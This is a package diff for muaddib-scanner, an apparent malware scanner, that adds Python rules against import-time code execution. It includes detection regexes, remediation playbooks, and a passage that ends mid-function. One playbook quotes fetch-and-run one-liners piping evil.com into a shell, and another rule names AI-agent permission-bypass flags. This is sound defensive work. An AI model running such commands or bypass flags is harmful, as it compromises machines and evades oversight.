muaddib-scanner 2.11.40 → 2.11.42
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/package.json
CHANGED
package/src/pipeline/executor.js
CHANGED
|
@@ -20,6 +20,7 @@ const { deobfuscate } = require('../scanner/deobfuscate.js');
|
|
|
20
20
|
const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows } = require('../scanner/module-graph');
|
|
21
21
|
const { loadCachedIOCs, checkIOCStaleness } = require('../ioc/updater.js');
|
|
22
22
|
const { detectPythonProject, normalizePythonName } = require('../scanner/python.js');
|
|
23
|
+
const { scanPythonSource } = require('../scanner/python-source.js');
|
|
23
24
|
const { Spinner, listInstalledPackages, wasFilesCapped, getOverflowFiles, debugLog } = require('../utils.js');
|
|
24
25
|
const { getMaxFileSize } = require('../shared/constants.js');
|
|
25
26
|
const { scanParanoid } = require('../scanner/paranoid.js');
|
|
@@ -202,7 +203,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
|
|
|
202
203
|
'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
|
|
203
204
|
'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
|
|
204
205
|
'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
|
|
205
|
-
'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
|
|
206
|
+
'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff', 'scanPythonSource'
|
|
206
207
|
];
|
|
207
208
|
|
|
208
209
|
const settledResults = await Promise.allSettled([
|
|
@@ -228,7 +229,12 @@ async function execute(targetPath, options, pythonDeps, warnings) {
|
|
|
228
229
|
// Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
|
|
229
230
|
// internal timeouts, but a registry slowdown with many added deps could exceed
|
|
230
231
|
// the static-scan budget without this cap.
|
|
231
|
-
withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
|
|
232
|
+
withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff'),
|
|
233
|
+
// PYSRC-001..008 (v2.11.25, TrapDoor PyPI gap). Detect import-time RCE
|
|
234
|
+
// in __init__.py / setup.py / top-level .py files. Runs always — not gated
|
|
235
|
+
// on detectPythonProject() because an attacker can ship a malicious __init__.py
|
|
236
|
+
// without a requirements.txt. Walker is cheap (just a depth-1 readdir).
|
|
237
|
+
yieldThen(() => scanPythonSource(targetPath))
|
|
232
238
|
]);
|
|
233
239
|
|
|
234
240
|
// Extract results: use empty array for rejected scanners, log errors
|
|
@@ -258,7 +264,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
|
|
|
258
264
|
antiForensicThreats,
|
|
259
265
|
stubPackageThreats,
|
|
260
266
|
monorepoThreats,
|
|
261
|
-
trustedDepDiffThreats
|
|
267
|
+
trustedDepDiffThreats,
|
|
268
|
+
pythonSourceThreats
|
|
262
269
|
] = scanResult;
|
|
263
270
|
|
|
264
271
|
// Emit warning if file count cap was hit + quick-scan overflow files
|
|
@@ -339,6 +346,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
|
|
|
339
346
|
...stubPackageThreats,
|
|
340
347
|
...monorepoThreats,
|
|
341
348
|
...trustedDepDiffThreats,
|
|
349
|
+
...pythonSourceThreats,
|
|
342
350
|
...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
|
|
343
351
|
type: f.type,
|
|
344
352
|
severity: f.severity,
|
|
@@ -409,6 +409,59 @@ const PLAYBOOKS = {
|
|
|
409
409
|
'pour inspecter le contenu reel. Supprimer le fichier ou nettoyer les caracteres invisibles ' +
|
|
410
410
|
'avant toute utilisation. Si deja ouvert avec un agent IA, regenerer tous les secrets touches.',
|
|
411
411
|
|
|
412
|
+
import_time_exec:
|
|
413
|
+
'CRITIQUE: Le fichier Python (__init__.py / setup.py / module top-level) execute exec() ou eval() ' +
|
|
414
|
+
'a l\'import ou pip install. RCE immediat sur la machine de l\'utilisateur. ' +
|
|
415
|
+
'NE PAS installer ce package. Si deja installe: pip uninstall immediatement, ' +
|
|
416
|
+
'auditer les processus en cours, regenerer les credentials potentiellement compromis. ' +
|
|
417
|
+
'Inspecter le code exec/eval pour identifier le payload reel.',
|
|
418
|
+
|
|
419
|
+
import_time_subprocess:
|
|
420
|
+
'CRITIQUE: Le fichier Python spawn un processus externe (subprocess.Popen/run/call/check_output) ' +
|
|
421
|
+
'a l\'import ou pip install. Generalement utilise pour fetch + execute remote payload, ' +
|
|
422
|
+
'lateral movement, ou installation de persistence. NE PAS installer. Verifier le contenu ' +
|
|
423
|
+
'de l\'appel pour identifier la commande executee. Auditer les processus enfants si deja installe.',
|
|
424
|
+
|
|
425
|
+
import_time_os_system:
|
|
426
|
+
'CRITIQUE: Le fichier Python execute des commandes shell (os.system / os.popen / os.spawn / os.exec) ' +
|
|
427
|
+
'a l\'import ou pip install. Pattern frequent: "curl evil.com | sh" ou "wget evil.com | bash". ' +
|
|
428
|
+
'NE PAS installer. Inspecter la commande exacte. Si execute: considerer la machine compromise.',
|
|
429
|
+
|
|
430
|
+
import_time_fetch_exec:
|
|
431
|
+
'CRITIQUE: Pattern TrapDoor detecte. Le fichier Python fetch un payload depuis le reseau ' +
|
|
432
|
+
'(urllib/requests/http.client/httpx/aiohttp) ET execute du code (exec/eval) dans le meme fichier. ' +
|
|
433
|
+
'C\'est la signature directe d\'une remote-payload-then-RCE. NE PAS installer. ' +
|
|
434
|
+
'Bloquer le domaine du fetch dans le firewall. Si execute: incident response complet, ' +
|
|
435
|
+
'regenerer TOUS les secrets sur la machine (SSH, AWS, GitHub, npm, env vars).',
|
|
436
|
+
|
|
437
|
+
import_time_base64_exec:
|
|
438
|
+
'CRITIQUE: Le fichier Python base64-decode du contenu ET execute (exec/eval) dans le meme fichier. ' +
|
|
439
|
+
'Pattern d\'obfuscation classique: payload encode pour echapper a la revue + grep statique. ' +
|
|
440
|
+
'NE PAS installer. Decoder le base64 manuellement pour identifier le payload reel ' +
|
|
441
|
+
'(python3 -c "import base64; print(base64.b64decode(b\'<payload>\').decode())").',
|
|
442
|
+
|
|
443
|
+
import_time_deserialization:
|
|
444
|
+
'CRITIQUE: Le fichier Python utilise pickle/marshal/dill/cloudpickle .loads() au niveau module. ' +
|
|
445
|
+
'Ces fonctions sont triviallement RCE si l\'input deserializise vient d\'une source attaquant-controllee ' +
|
|
446
|
+
'(fichier sur disque, requete HTTP, env var). NE PAS installer si l\'origine du blob deserialize ' +
|
|
447
|
+
'n\'est pas un fichier de donnees interne au package. Si interne: verifier l\'integrite (signature, hash).',
|
|
448
|
+
|
|
449
|
+
dynamic_dangerous_import:
|
|
450
|
+
'HIGH: Le fichier Python utilise __import__() avec un nom hardcode dangereux ' +
|
|
451
|
+
'(subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). ' +
|
|
452
|
+
'Pattern d\'obfuscation: evite "import X" statique pour bypass les scanners qui ne tracent ' +
|
|
453
|
+
'que les imports declares. Combinaison avec exec/subprocess/fetch indique malveillance. ' +
|
|
454
|
+
'Inspecter manuellement les appels suivants au module dynamiquement importe.',
|
|
455
|
+
|
|
456
|
+
python_source_unicode_obfuscation:
|
|
457
|
+
'CRITIQUE: Fichier Python contient ≥5 caracteres Unicode invisibles ' +
|
|
458
|
+
'(zero-width, directional override, variation selectors, tag characters). ' +
|
|
459
|
+
'Python rejette les identifiers avec ZW (PEP 3131 SyntaxError), donc le vecteur est ' +
|
|
460
|
+
'soit (a) obfuscation dans des strings (GlassWorm-style payload encoding via variation selectors), ' +
|
|
461
|
+
'soit (b) comments avec ZW pour induire en erreur la revue humaine. ' +
|
|
462
|
+
'NE PAS installer. Ouvrir le fichier dans un editeur affichant les caracteres invisibles ' +
|
|
463
|
+
'(VS Code: "editor.renderControlCharacters") pour inspecter le contenu reel.',
|
|
464
|
+
|
|
412
465
|
ai_agent_abuse:
|
|
413
466
|
'CRITIQUE: Un agent IA (Claude, Gemini, Q) est invoque avec des flags de bypass de securite ' +
|
|
414
467
|
'(--dangerously-skip-permissions, --yolo, --trust-all-tools). Technique s1ngularity/Nx. ' +
|
package/src/rules/index.js
CHANGED
|
@@ -224,6 +224,121 @@ const RULES = {
|
|
|
224
224
|
],
|
|
225
225
|
mitre: 'T1195.002'
|
|
226
226
|
},
|
|
227
|
+
|
|
228
|
+
// PYSRC-001 a 008 — Python source scanner (TrapDoor PyPI gap, v2.11.25).
|
|
229
|
+
// python.js est manifest-only ; ast.js/dataflow.js sont JS-only ; ioc-strings.js
|
|
230
|
+
// fait du literal match. Aucun ne couvre l'execution a l'import via __init__.py
|
|
231
|
+
// / setup.py. Ces 8 regles ferment ce gap.
|
|
232
|
+
import_time_exec: {
|
|
233
|
+
id: 'MUADDIB-PYSRC-001',
|
|
234
|
+
name: 'Python Import-Time exec/eval',
|
|
235
|
+
severity: 'CRITICAL',
|
|
236
|
+
confidence: 'high',
|
|
237
|
+
domain: 'malware',
|
|
238
|
+
description: 'Fichier Python (__init__.py, setup.py, top-level *.py) contient exec()/eval() — execution directe de code a l\'import ou a pip install. RCE immediat sur la machine de l\'utilisateur. Pattern central de TrapDoor (mai 2026).',
|
|
239
|
+
references: [
|
|
240
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
241
|
+
'https://attack.mitre.org/techniques/T1059/006/'
|
|
242
|
+
],
|
|
243
|
+
mitre: 'T1059.006'
|
|
244
|
+
},
|
|
245
|
+
import_time_subprocess: {
|
|
246
|
+
id: 'MUADDIB-PYSRC-002',
|
|
247
|
+
name: 'Python Import-Time subprocess',
|
|
248
|
+
severity: 'CRITICAL',
|
|
249
|
+
confidence: 'high',
|
|
250
|
+
domain: 'malware',
|
|
251
|
+
description: 'Fichier Python contient subprocess.Popen/run/call/check_output au niveau module — spawn d\'un processus externe a l\'import ou pip install. Utilise pour fetch + execute remote payload ou pour latteral movement.',
|
|
252
|
+
references: [
|
|
253
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
254
|
+
'https://attack.mitre.org/techniques/T1059/006/'
|
|
255
|
+
],
|
|
256
|
+
mitre: 'T1059.006'
|
|
257
|
+
},
|
|
258
|
+
import_time_os_system: {
|
|
259
|
+
id: 'MUADDIB-PYSRC-003',
|
|
260
|
+
name: 'Python Import-Time os.system / os.popen / os.spawn / os.exec',
|
|
261
|
+
severity: 'CRITICAL',
|
|
262
|
+
confidence: 'high',
|
|
263
|
+
domain: 'malware',
|
|
264
|
+
description: 'Fichier Python contient os.system(), os.popen(), os.spawn*() ou os.exec*() au niveau module — shell execution a l\'import ou pip install. Generalement utilise pour curl|sh ou wget|bash remote payload.',
|
|
265
|
+
references: [
|
|
266
|
+
'https://attack.mitre.org/techniques/T1059/006/',
|
|
267
|
+
'https://attack.mitre.org/techniques/T1059/004/'
|
|
268
|
+
],
|
|
269
|
+
mitre: 'T1059.006'
|
|
270
|
+
},
|
|
271
|
+
import_time_fetch_exec: {
|
|
272
|
+
id: 'MUADDIB-PYSRC-004',
|
|
273
|
+
name: 'Python Import-Time Fetch + Exec (TrapDoor pattern)',
|
|
274
|
+
severity: 'CRITICAL',
|
|
275
|
+
confidence: 'high',
|
|
276
|
+
domain: 'malware',
|
|
277
|
+
description: 'Compound detection : le meme fichier Python contient (urllib.request / requests / http.client / httpx / aiohttp) ET exec()/eval(). Signature directe de TrapDoor : telecharge un payload depuis le C2 et l\'execute. Implique RCE + capacite C2 active.',
|
|
278
|
+
references: [
|
|
279
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
280
|
+
'https://attack.mitre.org/techniques/T1105/',
|
|
281
|
+
'https://attack.mitre.org/techniques/T1059/006/'
|
|
282
|
+
],
|
|
283
|
+
mitre: 'T1105'
|
|
284
|
+
},
|
|
285
|
+
import_time_base64_exec: {
|
|
286
|
+
id: 'MUADDIB-PYSRC-005',
|
|
287
|
+
name: 'Python Import-Time Base64 Decode + Exec',
|
|
288
|
+
severity: 'CRITICAL',
|
|
289
|
+
confidence: 'high',
|
|
290
|
+
domain: 'malware',
|
|
291
|
+
description: 'Compound detection : le meme fichier Python contient base64.b64decode / codecs.decode ET exec()/eval(). Pattern d\'obfuscation classique : payload encode en base64 (parfois chaine multiple) puis execute. Vu dans Lazarus PyPI campaigns + TrapDoor.',
|
|
292
|
+
references: [
|
|
293
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
294
|
+
'https://attack.mitre.org/techniques/T1027/',
|
|
295
|
+
'https://attack.mitre.org/techniques/T1059/006/'
|
|
296
|
+
],
|
|
297
|
+
mitre: 'T1027'
|
|
298
|
+
},
|
|
299
|
+
import_time_deserialization: {
|
|
300
|
+
id: 'MUADDIB-PYSRC-006',
|
|
301
|
+
name: 'Python Import-Time Unsafe Deserialization',
|
|
302
|
+
severity: 'CRITICAL',
|
|
303
|
+
confidence: 'high',
|
|
304
|
+
domain: 'vulnerability',
|
|
305
|
+
description: 'Fichier Python utilise pickle/cPickle/marshal/dill/cloudpickle/jsonpickle/shelve .loads() au niveau module. Ces fonctions sont trivialement RCE si l\'input est attaquant-controle (deserialization = code execution). Risque critique meme sans malveillance prouvee.',
|
|
306
|
+
references: [
|
|
307
|
+
'https://docs.python.org/3/library/pickle.html#restricting-globals',
|
|
308
|
+
'https://attack.mitre.org/techniques/T1059/006/',
|
|
309
|
+
'https://cwe.mitre.org/data/definitions/502.html'
|
|
310
|
+
],
|
|
311
|
+
mitre: 'T1059.006'
|
|
312
|
+
},
|
|
313
|
+
dynamic_dangerous_import: {
|
|
314
|
+
id: 'MUADDIB-PYSRC-007',
|
|
315
|
+
name: 'Python Dynamic __import__ of Dangerous Module',
|
|
316
|
+
severity: 'HIGH',
|
|
317
|
+
confidence: 'medium',
|
|
318
|
+
domain: 'malware',
|
|
319
|
+
description: 'Fichier Python utilise __import__() avec un nom hardcode dangereux (subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). Pattern d\'obfuscation : evite l\'instruction "import X" statique pour echapper aux scanners qui ne tracent que les imports declares.',
|
|
320
|
+
references: [
|
|
321
|
+
'https://attack.mitre.org/techniques/T1027/',
|
|
322
|
+
'https://docs.python.org/3/library/functions.html#import__'
|
|
323
|
+
],
|
|
324
|
+
mitre: 'T1027'
|
|
325
|
+
},
|
|
326
|
+
python_source_unicode_obfuscation: {
|
|
327
|
+
id: 'MUADDIB-PYSRC-008',
|
|
328
|
+
name: 'Python Source Unicode Obfuscation',
|
|
329
|
+
severity: 'CRITICAL',
|
|
330
|
+
confidence: 'high',
|
|
331
|
+
domain: 'malware',
|
|
332
|
+
description: 'Fichier Python contient ≥5 caracteres Unicode invisibles (zero-width, directional override, variation selectors, tag characters). Mirror de AICONF-004 pour les sources .py. Python rejette les identifiers avec ZW chars (SyntaxError, PEP 3131), donc le vecteur principal c\'est l\'obfuscation dans les strings (GlassWorm-style payload encoding) ou dans les comments (mislead human review).',
|
|
333
|
+
references: [
|
|
334
|
+
'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
|
|
335
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
336
|
+
'https://trojansource.codes/',
|
|
337
|
+
'https://attack.mitre.org/techniques/T1027/'
|
|
338
|
+
],
|
|
339
|
+
mitre: 'T1027.013'
|
|
340
|
+
},
|
|
341
|
+
|
|
227
342
|
suspicious_file: {
|
|
228
343
|
id: 'MUADDIB-DEP-002',
|
|
229
344
|
name: 'Suspicious File in Dependency',
|
|
@@ -0,0 +1,319 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
|
|
3
|
+
/**
|
|
4
|
+
* Python Source Scanner — detects import-time / install-time RCE patterns.
|
|
5
|
+
*
|
|
6
|
+
* Created v2.11.25 (TrapDoor PyPI gap, mai 2026). `python.js` is a manifest
|
|
7
|
+
* parser (requirements.txt, setup.py, pyproject.toml — extracts dep names) ;
|
|
8
|
+
* it never reads package source. `ast.js` / `dataflow.js` use acorn (JS only)
|
|
9
|
+
* and skip `.py`. Only `ioc-strings.js` opens `.py` files, just for literal
|
|
10
|
+
* IOC matching. → A malicious `__init__.py` that fetches + execs a payload at
|
|
11
|
+
* import time was invisible to MUAD'DIB. This scanner closes that gap.
|
|
12
|
+
*
|
|
13
|
+
* Pas d'AST Python (CLAUDE.md interdit les deps runtime hors acorn / js-yaml /
|
|
14
|
+
* adm-zip / @inquirer/prompts). Détection par regex ciblées sur les API
|
|
15
|
+
* dangereuses, avec préprocessing :
|
|
16
|
+
* - strip des full-line comments (`^\s*#.*$`)
|
|
17
|
+
* - strip des triple-quoted strings (docstrings, block strings — réduit les
|
|
18
|
+
* FPs sur les docs qui mentionnent `exec`)
|
|
19
|
+
* - strip des chars Unicode invisibles via le helper partagé (mirror du fix
|
|
20
|
+
* AICONF-004 : empêche `e<ZWSP>xec(` de bypass — bien que Python rejette
|
|
21
|
+
* cet identifier comme SyntaxError, des invisibles dans des strings/comments
|
|
22
|
+
* restent un signal d'obfuscation valide).
|
|
23
|
+
*
|
|
24
|
+
* Rules : PYSRC-001 à PYSRC-008. Voir src/rules/index.js pour le détail.
|
|
25
|
+
*
|
|
26
|
+
* Références :
|
|
27
|
+
* - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
|
|
28
|
+
* - https://attack.mitre.org/techniques/T1059/006/ (Command Scripting Interpreter: Python)
|
|
29
|
+
*/
|
|
30
|
+
|
|
31
|
+
const fs = require('fs');
|
|
32
|
+
const path = require('path');
|
|
33
|
+
const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
|
|
34
|
+
|
|
35
|
+
const MAX_FILE_SIZE = 1024 * 1024; // 1 MB cap, cohérent avec ai-config.js
|
|
36
|
+
|
|
37
|
+
const PYSRC_UNICODE_THRESHOLD = 5;
|
|
38
|
+
|
|
39
|
+
// Dirs to skip when looking for __init__.py at depth-1. Couvre les patterns
|
|
40
|
+
// classiques (virtualenv, caches, tests, docs, build artifacts).
|
|
41
|
+
const EXCLUDED_DIRS = new Set([
|
|
42
|
+
'tests', 'test', '__pycache__', '.pytest_cache', '.tox', '.nox',
|
|
43
|
+
'.venv', 'venv', 'env', '.env',
|
|
44
|
+
'.git', '.hg', '.svn',
|
|
45
|
+
'node_modules',
|
|
46
|
+
'examples', 'example', 'sample', 'samples',
|
|
47
|
+
'docs', 'doc',
|
|
48
|
+
'build', 'dist', 'site-packages',
|
|
49
|
+
'.mypy_cache', '.ruff_cache', '.pytype', '.pyre',
|
|
50
|
+
'.muaddib-cache', '.idea', '.vscode'
|
|
51
|
+
]);
|
|
52
|
+
|
|
53
|
+
// Files explicitly targeted at root (always scanned if present).
|
|
54
|
+
const ROOT_TARGET_FILES = ['__init__.py', 'setup.py'];
|
|
55
|
+
|
|
56
|
+
/**
 * Collect the Python files this scanner inspects under `targetPath`.
 *
 * Three locations are probed, in this order:
 *   1. every entry directly in `targetPath` whose name ends in `.py` (or is
 *      listed in ROOT_TARGET_FILES) and that stats as a regular file;
 *   2. `<dir>/__init__.py` for each root directory that is neither in
 *      EXCLUDED_DIRS nor dot-prefixed;
 *   3. `src/<dir>/__init__.py`, with the same exclusions applied to `<dir>`.
 *
 * Every filesystem error is treated as "entry not usable" and skipped.
 *
 * @param {string} targetPath Directory to inspect.
 * @returns {string[]} Deduplicated paths, each built by joining onto
 *   `targetPath`. Empty when `targetPath` cannot be listed.
 */
function findTargetPythonFiles(targetPath) {
  // stat-based probes: a failing stat simply answers "no".
  const isRegularFile = (candidate) => {
    try {
      return fs.statSync(candidate).isFile();
    } catch {
      return false;
    }
  };
  const isDirectory = (candidate) => {
    try {
      return fs.statSync(candidate).isDirectory();
    } catch {
      return false;
    }
  };

  let rootNames;
  try {
    rootNames = fs.readdirSync(targetPath);
  } catch {
    return [];
  }

  const found = new Set();
  const addPackageInit = (packageDir) => {
    const initFile = path.join(packageDir, '__init__.py');
    if (isRegularFile(initFile)) found.add(initFile);
  };

  // Pass 1: Python files sitting directly in the root.
  for (const name of rootNames) {
    const wanted = name.endsWith('.py') || ROOT_TARGET_FILES.includes(name);
    if (!wanted) continue;
    const candidate = path.join(targetPath, name);
    if (isRegularFile(candidate)) found.add(candidate);
  }

  // Pass 2: package directories one level down, plus the src-layout.
  for (const name of rootNames) {
    if (EXCLUDED_DIRS.has(name)) continue;
    if (name.startsWith('.') && name !== '.') continue;

    const packageDir = path.join(targetPath, name);
    if (!isDirectory(packageDir)) continue;
    addPackageInit(packageDir);

    if (name !== 'src') continue;

    // src-layout: the importable packages live one level below `src/`.
    let srcNames;
    try {
      srcNames = fs.readdirSync(packageDir);
    } catch {
      continue;
    }
    for (const inner of srcNames) {
      if (EXCLUDED_DIRS.has(inner) || inner.startsWith('.')) continue;
      const innerDir = path.join(packageDir, inner);
      if (isDirectory(innerDir)) addPackageInit(innerDir);
    }
  }

  return Array.from(found);
}
|
|
118
|
+
|
|
119
|
+
/**
 * Blank out full-line Python comments (lines whose first non-whitespace
 * character is `#`). Trailing comments after code are left untouched.
 *
 * Lines are split on CRLF, LF and a lone CR. Python accepts all three as
 * physical line terminators, so splitting only on LF/CRLF would treat
 * `# note\rexec(payload)` as a single comment line and erase the code that
 * Python actually executes after the CR.
 *
 * @param {string} content Python source text.
 * @returns {string} The same lines joined with `\n`, with every full-line
 *   comment replaced by an empty line (the line count is preserved).
 */
function stripPythonComments(content) {
  return content
    .split(/\r\n|\r|\n/)
    .map((line) => (line.trimStart().startsWith('#') ? '' : line))
    .join('\n');
}
|
|
133
|
+
|
|
134
|
+
/**
 * Collapse triple-quoted string literals (`"""..."""` and `'''...'''`) to an
 * empty literal of the same quote kind (`""` / `''`), so free-form docstring
 * text mentioning `exec`, `subprocess`, ... is not mistaken for a call site.
 * Ordinary single-line strings are kept verbatim (payloads are often hidden
 * in `exec("import os; ...")`).
 *
 * The text is scanned once, left to right, tracking three lexical contexts:
 *   - `#` comments run to the end of the line and never open a string;
 *   - ordinary `'...'` / `"..."` strings end at the matching quote or at the
 *     end of the line, and never open a triple-quoted string;
 *   - triple-quoted strings end at the next unescaped matching fence.
 * Matching the two fences with independent regexes would let a `"""` placed
 * in a comment, in a `'''` literal or in an ordinary string pair up with a
 * later `"""` and delete the live code in between.
 *
 * An unterminated triple-quoted string is left as-is together with
 * everything after it.
 *
 * NOTE(review): string prefixes (r/b/f) need no special handling to find the
 * closing quote, but nested quotes inside f-string expressions (Python 3.12+)
 * are not modelled.
 *
 * @param {string} content Python source text.
 * @returns {string} `content` with each triple-quoted literal collapsed.
 */
function stripTripleQuotedStrings(content) {
  const len = content.length;
  const isEol = (c) => c === '\n' || c === '\r';
  // Width of a backslash escape starting at `at`; a backslash before CRLF
  // spans three characters so a continued string is not cut at the LF.
  const escapeWidth = (at) =>
    (content[at + 1] === '\r' && content[at + 2] === '\n' ? 3 : 2);

  const pieces = [];
  let copiedUpTo = 0; // everything before this index is already in `pieces`
  let i = 0;

  while (i < len) {
    const ch = content[i];

    if (ch === '#') {
      // Comment: skip to end of line without interpreting quotes.
      while (i < len && !isEol(content[i])) i += 1;
      continue;
    }

    if (ch !== '"' && ch !== "'") {
      i += 1;
      continue;
    }

    const fence = ch + ch + ch;
    if (content.startsWith(fence, i)) {
      let close = i + 3;
      while (close < len && !content.startsWith(fence, close)) {
        close += content[close] === '\\' ? escapeWidth(close) : 1;
      }
      if (close >= len) break; // unterminated: keep the remainder verbatim
      pieces.push(content.slice(copiedUpTo, i), ch + ch);
      i = close + 3;
      copiedUpTo = i;
      continue;
    }

    // Ordinary string: advance past it so quotes inside are not re-read.
    let end = i + 1;
    while (end < len && content[end] !== ch && !isEol(content[end])) {
      end += content[end] === '\\' ? escapeWidth(end) : 1;
    }
    i = end < len && content[end] === ch ? end + 1 : Math.min(end, len);
  }

  pieces.push(content.slice(copiedUpTo));
  return pieces.join('');
}
|
|
149
|
+
|
|
150
|
+
// --- Pattern detectors. All operate on a content string that has already
|
|
151
|
+
// been Unicode-normalized + comment-stripped + docstring-stripped.
|
|
152
|
+
|
|
153
|
+
/**
 * Report whether the text contains a bare `exec(` or `eval(` call.
 *
 * The name must not be preceded by `.` or a word character, so `obj.exec(`
 * and `ast.literal_eval(` are ignored. Whitespace between the name and `(`
 * is allowed.
 *
 * @param {string} content Pre-processed Python source text.
 * @returns {boolean} True when a bare exec/eval call is present.
 */
function detectImportTimeExec(content) {
  const bareExecOrEval = /(?<![.\w])(exec|eval)\s*\(/;
  return bareExecOrEval.exec(content) !== null;
}
|
|
157
|
+
|
|
158
|
+
/**
 * Report whether the text calls one of the process-spawning helpers of the
 * `subprocess` module: Popen, run, call, check_output, check_call, getoutput
 * or getstatusoutput (optionally with whitespace before the `(`).
 *
 * @param {string} content Pre-processed Python source text.
 * @returns {boolean} True when such a call is present.
 */
function detectImportTimeSubprocess(content) {
  const spawnCall = /\bsubprocess\.(Popen|run|call|check_output|check_call|getoutput|getstatusoutput)\s*\(/;
  return spawnCall.exec(content) !== null;
}
|
|
161
|
+
|
|
162
|
+
/**
 * Report whether the text calls a command-running function of the `os`
 * module: `os.system`, `os.popen` (optionally suffixed 2/3/4), or any
 * `os.spawn<letters>` / `os.exec<letters>` variant, where at least one
 * lowercase letter must follow `spawn` / `exec`.
 *
 * @param {string} content Pre-processed Python source text.
 * @returns {boolean} True when such a call is present.
 */
function detectImportTimeOsSystem(content) {
  const osCommandCall = /\bos\.(system|popen[234]?|spawn[a-z]+|exec[a-z]+)\s*\(/;
  return osCommandCall.exec(content) !== null;
}
|
|
166
|
+
|
|
167
|
+
/**
 * Report whether the text references one of the recognised HTTP client entry
 * points: `urllib.request.urlopen(`, `urllib2.urlopen(`, a `requests.<verb>(`
 * call, `http.client.HTTP(S)Connection`, an `httpx` verb or client class, or
 * `aiohttp.ClientSession`.
 *
 * @param {string} content Pre-processed Python source text.
 * @returns {boolean} True when any of the patterns matches.
 */
function detectNetworkFetch(content) {
  const fetchPatterns = [
    /\burllib\.request\.urlopen\s*\(/,
    /\burllib2\.urlopen\s*\(/,
    /\brequests\.(get|post|put|delete|patch|head|options|request)\s*\(/,
    /\bhttp\.client\.HTTPS?Connection\b/,
    /\bhttpx\.(get|post|put|delete|patch|head|options|request|Client|AsyncClient)\b/,
    /\baiohttp\.ClientSession\b/
  ];
  return fetchPatterns.some((pattern) => pattern.test(content));
}
|
|
176
|
+
|
|
177
|
+
/**
 * Report whether the text calls a decoder commonly used to unpack an encoded
 * payload: `base64.{b64,b32,b16,standard_b64,urlsafe_b64}decode(` or
 * `codecs.decode(`.
 *
 * @param {string} content Pre-processed Python source text.
 * @returns {boolean} True when either decoder family is called.
 */
function detectBase64Decode(content) {
  const base64Family = /\bbase64\.(b64|b32|b16|standard_b64|urlsafe_b64)decode\s*\(/;
  const codecsDecode = /\bcodecs\.decode\s*\(/;
  return base64Family.test(content) || codecsDecode.test(content);
}
|
|
182
|
+
|
|
183
|
+
/**
 * Report whether the text calls `.load(` or `.loads(` on one of the
 * object-deserialisation modules: pickle, cPickle, marshal, dill,
 * cloudpickle, jsonpickle or shelve.
 *
 * @param {string} content Pre-processed Python source text.
 * @returns {boolean} True when such a call is present.
 */
function detectDeserialization(content) {
  const unsafeLoad = /\b(pickle|cPickle|marshal|dill|cloudpickle|jsonpickle|shelve)\.loads?\s*\(/;
  return unsafeLoad.exec(content) !== null;
}
|
|
186
|
+
|
|
187
|
+
/**
 * Report whether the text calls `__import__(` with a quoted literal naming
 * exactly one of: subprocess, os, requests, urllib, urllib2, socket, http,
 * ssl, ctypes, importlib. Dotted names such as 'os.path' and non-literal
 * arguments do not match.
 *
 * @param {string} content Pre-processed Python source text.
 * @returns {boolean} True when such a dynamic import is present.
 */
function detectDynamicDangerousImport(content) {
  const literalDangerousImport = /__import__\s*\(\s*['"](subprocess|os|requests|urllib|urllib2|socket|http|ssl|ctypes|importlib)['"]/;
  return literalDangerousImport.exec(content) !== null;
}
|
|
190
|
+
|
|
191
|
+
/**
 * Scan the Python entry-point files under `targetPath` and report risky
 * constructs.
 *
 * For each file returned by findTargetPythonFiles() that is a non-empty
 * regular file no larger than MAX_FILE_SIZE:
 *   1. invisible Unicode characters are counted on the raw text, and a
 *      finding is emitted when the count reaches PYSRC_UNICODE_THRESHOLD;
 *   2. the text is cleaned (invisible characters, triple-quoted strings and
 *      full-line comments removed);
 *   3. the regex detectors run on the cleaned text; each hit yields one
 *      finding, and two compound findings are added when exec/eval co-occurs
 *      with a network fetch or with a base64/codecs decode.
 *
 * The detectors are plain text matches over the whole file; they do not
 * check that a call actually sits at module level. Unreadable, empty and
 * oversized files are skipped without a finding.
 *
 * @param {string} targetPath Directory to scan.
 * @returns {Array<{type: string, severity: string, message: string, file: string}>}
 *   Findings in emission order; `file` is relative to `targetPath`.
 */
function scanPythonSource(targetPath) {
  const findings = [];

  for (const absPath of findTargetPythonFiles(targetPath)) {
    let source;
    try {
      const info = fs.statSync(absPath);
      if (!info.isFile() || info.size === 0 || info.size > MAX_FILE_SIZE) continue;
      source = fs.readFileSync(absPath, 'utf8');
    } catch {
      continue;
    }

    const relPath = path.relative(targetPath, absPath);
    const report = (type, severity, message) => {
      findings.push({ type, severity, message, file: relPath });
    };

    // Unicode obfuscation is measured on the raw text, before any stripping.
    const invisibleCount = countInvisibleUnicode(source);
    if (invisibleCount >= PYSRC_UNICODE_THRESHOLD) {
      report(
        'python_source_unicode_obfuscation',
        'CRITICAL',
